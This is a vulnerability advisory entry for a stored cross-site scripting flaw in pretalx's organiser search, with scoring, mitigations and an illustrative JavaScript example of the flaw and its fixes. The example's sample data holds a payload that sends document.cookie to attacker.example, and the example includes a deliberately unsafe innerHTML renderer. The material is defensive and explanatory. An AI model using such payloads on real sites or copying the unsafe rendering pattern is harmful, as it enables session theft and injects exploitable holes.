CVE-2026-41241
Published: 23 April 2026
Summary
CVE-2026-41241 is a high-severity cross-site scripting (CWE-79) vulnerability in pretalx, an open-source conference planning tool. Its CVSS v3.1 base score is 8.7 (High).
Exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The vulnerability ranks in the 6.2nd percentile for exploit likelihood (below the median) and is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-15 (Information Output Filtering) and SI-2 (Flaw Remediation).
Deeper analysis
CVE-2026-41241 is a cross-site scripting (XSS) vulnerability, classified under CWE-79, affecting pretalx, an open-source conference planning tool. Published on 2026-04-23, the issue exists in versions prior to 2026.1.0, where the organizer search functionality in the pretalx backend renders submission titles, speaker display names, and user names or emails into the result dropdown using unsafe innerHTML string interpolation.
The vulnerability can be exploited by any registered user who controls one of the affected fields, such as their own display name, which an organizer may later look up. When an organizer runs a search query that matches the malicious record, the injected HTML or JavaScript executes in the organizer's browser, with the organizer's session and privileges. The vector is CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N, scoring 8.7: the attacker needs only low privileges (PR:L, a registered account) and one user interaction from the organizer (UI:R), the attack is network-based (AV:N) and low in complexity (AC:L), and because the payload runs in a different security authority than the component it was stored through, the scope is changed (S:C). Confidentiality and integrity impact are High (C:H/I:H) since the script can read and act on anything the organizer's account can; availability is not affected (A:N).
The vulnerability is addressed in pretalx version 2026.1.0. Additional details on the issue and mitigation are available in the GitHub security advisory at https://github.com/pretalx/pretalx/security/advisories/GHSA-cjcx-jfp2-f7m2.
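The rendering pattern the advisory describes, shown as an added example that is not pretalx's own code: a dropdown renderer that interpolates user-controlled fields straight into markup destined for innerHTML, beside two hardened alternatives. The field names, the result-object shape, the helper names and the sample records (including the payload in the speaker's display name) are constructed assumptions for illustration, not taken from the pretalx code base.

```javascript
// Added example (not pretalx's own code): the unsafe innerHTML interpolation
// pattern described in the advisory, next to two hardened alternatives.
// Field names, the `results` shape and the sample records are assumptions
// constructed for illustration; they are not taken from the pretalx code base.

// Constructed sample search results. The second record carries a display name
// that a registered user could set themselves.
const SAMPLE_RESULTS = [
  {
    type: "submission",
    title: "Keynote: Opening Remarks",
    url: "/orga/event/demo/submissions/ABC123/",
  },
  {
    type: "speaker",
    title: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
    url: "/orga/event/demo/speakers/42/",
  },
];

// VULNERABLE: user-controlled fields are concatenated straight into markup.
// Assigning this string to element.innerHTML parses the <img> tag and runs
// its onerror handler in the organiser's browser.
function renderDropdownUnsafe(results) {
  return results
    .map((r) => `<li class="result ${r.type}"><a href="${r.url}">${r.title}</a></li>`)
    .join("");
}

// FIX 1: escape the five HTML-significant characters before interpolation,
// so the browser renders the payload as literal text rather than as an element.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function renderDropdownEscaped(results) {
  return results
    .map(
      (r) =>
        `<li class="result ${escapeHtml(r.type)}">` +
        `<a href="${escapeHtml(r.url)}">${escapeHtml(r.title)}</a></li>`
    )
    .join("");
}

// FIX 2 (preferred in browser code): do not build markup from strings at all.
// Create nodes with the DOM API and set text via textContent, which cannot
// introduce new elements. Needs a DOM (`document`), so it is defined here for
// comparison but not executed in this stand-alone script.
function renderDropdownDom(container, results) {
  container.replaceChildren();
  for (const r of results) {
    const li = document.createElement("li");
    li.className = `result ${r.type}`;
    const a = document.createElement("a");
    a.href = r.url;
    a.textContent = r.title; // payload becomes inert text
    li.appendChild(a);
    container.appendChild(li);
  }
}

// Check used on the two string renderers: does the output still contain an
// element tag that originated in the user-controlled field?
function containsInjectedTag(html) {
  return /<img\b/i.test(html);
}

// Stand-alone demonstration.
console.log("unsafe output contains injected tag:", containsInjectedTag(renderDropdownUnsafe(SAMPLE_RESULTS)));
console.log("escaped output contains injected tag:", containsInjectedTag(renderDropdownEscaped(SAMPLE_RESULTS)));
```

The escaping helper covers text content and double-quoted attribute values only; a URL attribute such as href needs its own scheme allow-list, which this example does not implement. The page does not say which of the two approaches pretalx 2026.1.0 adopted, only that 2026.1.0 fixes the issue.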
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2026-25273
Vulnerability details
pretalx is a conference planning tool. Prior to 2026.1.0, the organiser search in the pretalx backend rendered submission titles, speaker display names, and user names/emails into the result dropdown using innerHTML string interpolation. Any user who controls one of those fields (which includes any registered user whose display name is looked up by an administrator) could include HTML or JavaScript that would execute in an organiser's browser when the organiser's search query matched the malicious record. This vulnerability is fixed in 2026.1.0.
- CWE(s): CWE-79 (Cross-site Scripting)
Related Threats
MITRE ATT&CK Enterprise Techniques
Why these techniques?
Stored XSS in a public-facing web application maps to Exploit Public-Facing Application (T1190); the injected payload is arbitrary JavaScript executed in the victim's browser (T1059.007, Command and Scripting Interpreter: JavaScript).
Mitigating Controls (NIST 800-53 r5)
- SI-15 (Information Output Filtering): directly mitigates the XSS by requiring output encoding of user-controlled fields such as submission titles and display names before they are rendered into the search dropdown, instead of interpolating them into innerHTML.
- Information input validation: validates user inputs such as display names, speaker names, and emails to reject or sanitize HTML/JavaScript prior to storage. This is defence in depth only; output encoding at the render site remains the primary control.
- SI-2 (Flaw Remediation): ensures timely identification, reporting, and patching of the flaw, in practice by upgrading pretalx to 2026.1.0 or later.